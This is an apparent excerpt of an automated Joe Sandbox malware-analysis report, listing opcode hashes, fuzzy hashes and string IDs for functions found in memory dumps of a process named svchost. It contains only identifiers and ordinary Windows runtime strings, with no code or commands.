                                                                                            • API String ID: 2994545307-634100481
                                                                                            • Opcode ID: 1a506d39b7540ce06c88a39ab856b30e8fb7da990d5bcbe32583788bd8558ac1
                                                                                            • Instruction ID: fe63cef0f58181a8f0ad6ca9a193e05bfccce0e5103537f7dbb1726626a0688d
                                                                                            • Opcode Fuzzy Hash: 1a506d39b7540ce06c88a39ab856b30e8fb7da990d5bcbe32583788bd8558ac1
                                                                                            • Instruction Fuzzy Hash: 83611972E007189FDB25DFA9C980FAEBBB9FB48700F14446EE559EB291D731A940CB50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$$
                                                                                            • API String ID: 0-233714265
                                                                                            • Opcode ID: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                                                                            • Instruction ID: 14f5573c7da737d43996675d3e16fe1be76eff62064721f2db823f9f97dab2d7
                                                                                            • Opcode Fuzzy Hash: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                                                                            • Instruction Fuzzy Hash: E0619875A00749DFDB20EFA4C684BA9B7B1BB88308F18516FE515AF780CB74A941CB90
                                                                                            Strings
                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 03A3A2FB
                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 03A3A309
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                            • API String ID: 0-2876891731
                                                                                            • Opcode ID: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                                                                            • Instruction ID: 1e984b6ce8cfbe99f09a20eeb728b9390f0b5f5433304e694890da2cf546d44e
                                                                                            • Opcode Fuzzy Hash: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                                                                            • Instruction Fuzzy Hash: 02418E39A04659DBDB11CF69C840B69B7F4EF86700F1844ABEC44EB391E335D940CB51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .Local\$@
                                                                                            • API String ID: 0-380025441
                                                                                            • Opcode ID: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                                                                            • Instruction ID: 217f52c9be5798c8a8e774fec2ba42c26763eceef0c792221df439a303396b1d
                                                                                            • Opcode Fuzzy Hash: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                                                                            • Instruction Fuzzy Hash: 8031A17A5093049FCB10DF28C984A5BBBF8EBC5654F48092FF595872A0DA30DD05CB92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: MUI
                                                                                            • API String ID: 0-1339004836
                                                                                            • Opcode ID: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                                                                            • Instruction ID: 677922b58dce1b654552457bfd1fe1c2554a5188b2ce59053ef5459f6cdb6860
                                                                                            • Opcode Fuzzy Hash: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                                                                            • Instruction Fuzzy Hash: E8822775E00218DFDB24CFA9C984BADF7B5BF4A710F18816AE859AB394D7309D81CB50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: P`vRbv
                                                                                            • API String ID: 0-2392986850
                                                                                            • Opcode ID: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
                                                                                            • Instruction ID: 614cf0fe81c0d5ac59cda9ef0b1b4f7ab7f7f86c7e6bb9ac2e62ff2701397f9d
                                                                                            • Opcode Fuzzy Hash: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
                                                                                            • Instruction Fuzzy Hash: 6142BE7DD04259AEDF29EFA8D8446BDFBB5AF05B10F18806FE441AB2D0D7748A81CB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                                                                            • Instruction ID: eb0fd9238ef9833a818ff9a74a081080f367bfb7fa71a8f3f298ece9abdc4357
                                                                                            • Opcode Fuzzy Hash: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                                                                            • Instruction Fuzzy Hash: F5A169B5608342CFD724DF28D580A2ABBF9BF89304F1449AEF5859B350E731E945CB92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0
                                                                                            • API String ID: 0-4108050209
                                                                                            • Opcode ID: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                                                                            • Instruction ID: fe18fdf758ddbb705bb336e58ff3e2fe2c24488414bd99d2642f4bbddba1e867
                                                                                            • Opcode Fuzzy Hash: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                                                                            • Instruction Fuzzy Hash: 2DF18E796087458FDF25CF25C580B6ABBE5AFC8650F09486FFC8A9B380DB30D9498B51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (
                                                                                            • API String ID: 0-3887548279
                                                                                            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                            • Instruction ID: 909e4fd7064320abce83f4abc93d9c6d057b2f37113d79d8bb154cac043e28a7
                                                                                            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                            • Instruction Fuzzy Hash: 15021EB6E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PATH
                                                                                            • API String ID: 0-1036084923
                                                                                            • Opcode ID: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                                                                            • Instruction ID: 2a963f764ed2de4f2c4e31656ad1c2685209a33c935d619a4681d83f28ec82f4
                                                                                            • Opcode Fuzzy Hash: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                                                                            • Instruction Fuzzy Hash: 61F1C079D04218DBCF25DF98D981ABEB7B5FF89700F48812AF445AB390D774A841CB61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c11fbf2f04bcbd650e43de2c28a217049f454bce5c912b115dc58a59ef5184f2
                                                                                            • Instruction ID: 1112202be1040bd41c8c32b9f50e9226aa79b4f364d7c1dbbbf504b3a5290133
                                                                                            • Opcode Fuzzy Hash: c11fbf2f04bcbd650e43de2c28a217049f454bce5c912b115dc58a59ef5184f2
                                                                                            • Instruction Fuzzy Hash: FC414978900288AFDB21DFA9D980AAEFBF4FB48304F14416FE859AB211D7359940CB60
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
Strings
• String ID: @
Strings
• String ID: @
Strings
• String ID: EXT-
Strings
• String ID: PreferredUILanguages
Strings
• String ID: BinaryHash
Strings
• String ID: verifier.dll
Strings
• String ID: Flst
Strings
• String ID: Actx
Strings
• String ID: LdrCreateEnclave
                                                                                            • Instruction ID: 7d9423239c206e83e48264a510a76ab65fad31c980a57d05a1c3bd774e68a426
                                                                                            • Opcode Fuzzy Hash: 4a63ee264ef4f64deadc8d159b05abd103338748a5a7b860e26c317acb37ee74
                                                                                            • Instruction Fuzzy Hash: 5522C376900609DFDB10DFA8C984BAEB7B5FF88314F1486ABE8149B345E734DA45CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                                                                            • Instruction ID: 1d437bc637994d3992a72425f0fbfaae8e3bf18cb03c79e04429648cfe023f1b
                                                                                            • Opcode Fuzzy Hash: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                                                                            • Instruction Fuzzy Hash: 7C228F796047128FC718CF59C490A2AF3E5FF89314B188A6EFA96CB355D730E842CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                                                                            • Instruction ID: 94df3cf246010cfaafb1c0041b3ecd38d6ee7f8b71d6a42ad1d269ada8b0e0de
                                                                                            • Opcode Fuzzy Hash: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                                                                            • Instruction Fuzzy Hash: 0E222D74E00216DBDF15CF95C5809BEFBFABF88704B18849BE845AB241E738D981CB64
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                                                                            • Instruction ID: b62ed8de75b2f781a22b7813e12d41d21ccbffb24ed0dd0a4fb1a4ea06d110a2
                                                                                            • Opcode Fuzzy Hash: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                                                                            • Instruction Fuzzy Hash: 3202C0386046518FDB64CFAAC490375F7F1AF85300B58899FFA96CB281D738D842DB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                                                                            • Instruction ID: 3b811accfb1cfa5ce37e2aabf50c2229fa77ce07ce53558ac097391ac4897ee2
                                                                                            • Opcode Fuzzy Hash: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                                                                            • Instruction Fuzzy Hash: 73F1C372E006159BCB18CFA9C9A067EFFF5EF98214B1941B9D456DB3C0E634EA41CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                            • Instruction ID: 1d7445901ad3d4edfdedc228e69f0dcd04ca8f524cba06b69e646b19a8f1f8f6
                                                                                            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                            • Instruction Fuzzy Hash: D7026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                                                                            • Instruction ID: d1e54e0368da9e29f3f0aed82128caba8a998576649fb9c4ca28242c9b9f0125
                                                                                            • Opcode Fuzzy Hash: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                                                                            • Instruction Fuzzy Hash: CFF19372E006269BCB28CE68C9A05BDFFB5EF45214B1946B9D856EB3C0D734DE41CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                                                                            • Instruction ID: 6a4a050eae1b7e7f7f1533120f3ed1f1b40df9eb20d4c6b5a0700e11c6d87b1e
                                                                                            • Opcode Fuzzy Hash: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                                                                            • Instruction Fuzzy Hash: 52F1C175900609DFDB14DFA8C980BAEB7B5FF48304F1886AAE815EB345E734DA45CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e46fd6d0a1d841b8604bbc54a2ac79415a4bbf07894b8e283f8db1d19a4d9b86
                                                                                            • Instruction ID: 927d3428b01d58fea038c7f0fc5786fa773a0886d2df4d44e84bea54f7504ba6
                                                                                            • Opcode Fuzzy Hash: e46fd6d0a1d841b8604bbc54a2ac79415a4bbf07894b8e283f8db1d19a4d9b86
                                                                                            • Instruction Fuzzy Hash: ABB144316181858BCB29D978C99C2D97BA2EB9A354F1C41BEC440EF7C3E67E8807C385
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                                                                            • Instruction ID: 939cfa0ea574c21447ad650e9f46939894ca7ff5000eaa234cc67455e4292d0b
                                                                                            • Opcode Fuzzy Hash: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                                                                            • Instruction Fuzzy Hash: 22D1C575A007269FCB14DF68C990ABABBB9BF54304F08466FF816DB280E738D945C760
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                                                                            • Instruction ID: b2ffc979e7cadfe790f9783d28e1dbfa097eb35e5f5a32582f4532ce140d7aa8
                                                                                            • Opcode Fuzzy Hash: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                                                                            • Instruction Fuzzy Hash: CAD16971E043199BEF28CF98C5847BDBBB6FB45320F18806FE942AB699D7748941CB44
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                                                                            • Instruction ID: 903f77be1ac4cbca7fe8baf5e9558ff801441611d76a48730291500461cb91d8
                                                                                            • Opcode Fuzzy Hash: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                                                                            • Instruction Fuzzy Hash: 59E18D75A00205CFDB18CF59C990BAAB7F5FF98310F2881AEE855AB791D730E951CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 75a722c63460b45cf499efff8fdd3bf73e73ceb327c6b226970a47f4706e03cf
                                                                                            • Instruction ID: f4b7adac504025bebbe3cadeac8e0987fca3345e1a0651529aef0ab6ce85b13f
                                                                                            • Opcode Fuzzy Hash: 75a722c63460b45cf499efff8fdd3bf73e73ceb327c6b226970a47f4706e03cf
                                                                                            • Instruction Fuzzy Hash: 54D1B431A003198FDB35DB19C994BAAF7B5BB89304F0841EFD9099B242D774AD85CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a5f30605faa9238452d1ae9b346d32fcb01466614ddf09d838fb08675a92b04
                                                                                            • Instruction ID: 91b341f987e0021196cfe70de431e38e2335d18662574aba47b70191637fdce5
                                                                                            • Opcode Fuzzy Hash: 2a5f30605faa9238452d1ae9b346d32fcb01466614ddf09d838fb08675a92b04
                                                                                            • Instruction Fuzzy Hash: 3FC17375E002159BEF14CF5AC940BAEF7B5EB59314F18826FE815AB390D774A942CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                            • Instruction ID: c3b8d86407b2679d645a641917bf6fabe3876ff33f0c1963e09ceecf27313c6c
                                                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                            • Instruction Fuzzy Hash: F7B15074A00744AFDB28DF99C940EEBB7BDFF84304F14446EA9529B796DA38E905CB10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                            • Instruction ID: e9098882c6ac9fdd2b330ae05871ab73bbd017513b3bbca89b0527953fd76a6d
                                                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                            • Instruction Fuzzy Hash: F0B12435600645AFDF21DB68C940BBEFBF6EF89200F18459BD642AB381DB30E941DB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4914fbd8ec3692c8f7878bc08d4f8b373f961683d4bb13091dadd7dd0d0973c6
                                                                                            • Instruction ID: 866d99ded5bffed84e667a391d276ea3bec99fc0a362cf048515939d6cbaa721
                                                                                            • Opcode Fuzzy Hash: 4914fbd8ec3692c8f7878bc08d4f8b373f961683d4bb13091dadd7dd0d0973c6
                                                                                            • Instruction Fuzzy Hash: FDA14975900215AFEF26EFA4CC85FAFB7B9AF55750F05005AFA00AF2A0D7759850CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                            • Instruction ID: 410027a447294b0fe076a5467849a7f6c2d4b3fe59bc60b5e2ff0c919b694c4a
                                                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                            • Instruction Fuzzy Hash: 6F716275E00619AFCB10DFA5CA44EDEBBB8FF84700F14456AE505AB351DB34EA05CB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e5d9382b475e83bddac0287749266de039603773d4f9e07558f3bf107048513
                                                                                            • Instruction ID: 22ea239124a80a6c05ae2f3629092a5b100deeb4a02c2c3ceea74d3df88ce04a
                                                                                            • Opcode Fuzzy Hash: 0e5d9382b475e83bddac0287749266de039603773d4f9e07558f3bf107048513
                                                                                            • Instruction Fuzzy Hash: DC71F036250B41AFDB31DF14CA84FAAB7B5EF84720F18492EE2569B2B0D774E944CB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe064efae241bba083a45b10b87e640edcb3c620a0ef15e61de8662abdf17c00
                                                                                            • Instruction ID: eda54f14327f02ee44bd8bfb20e6eed1e3434448bc382ea5fe8b1e3a8b82b10c
                                                                                            • Opcode Fuzzy Hash: fe064efae241bba083a45b10b87e640edcb3c620a0ef15e61de8662abdf17c00
                                                                                            • Instruction Fuzzy Hash: 37513B75A002255FCB14DFA9C980ABAF7F6EF88350B18416EFE55DB384DA35C902C7A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b196f64b83055bf841cf71f0ec4957dc095e6bbc8f0183c734c4aa9c3cbf4852
                                                                                            • Instruction ID: 89148de5321adbf616ebf5eb64088e53e4f8ec86c4a2f389848cef960d1f55bb
                                                                                            • Opcode Fuzzy Hash: b196f64b83055bf841cf71f0ec4957dc095e6bbc8f0183c734c4aa9c3cbf4852
                                                                                            • Instruction Fuzzy Hash: FC816D75A00205DFCB09CF99C590AAEB7F1FF88304F1981AAE859EB345D734EA41CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 875d6946d9e85bea22189d46ab6052df7df89fd44149fcdebdaf4934939f957a
                                                                                            • Instruction ID: 81f3248298b1a5ed30268890f52c4dd8d2a4cfb4b5b92e4622d7b4aea49a1421
                                                                                            • Opcode Fuzzy Hash: 875d6946d9e85bea22189d46ab6052df7df89fd44149fcdebdaf4934939f957a
                                                                                            • Instruction Fuzzy Hash: 3661DE75600715AFD765DFA5C984BABFBA8FF88710F04462EFA598B240DB30E510CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
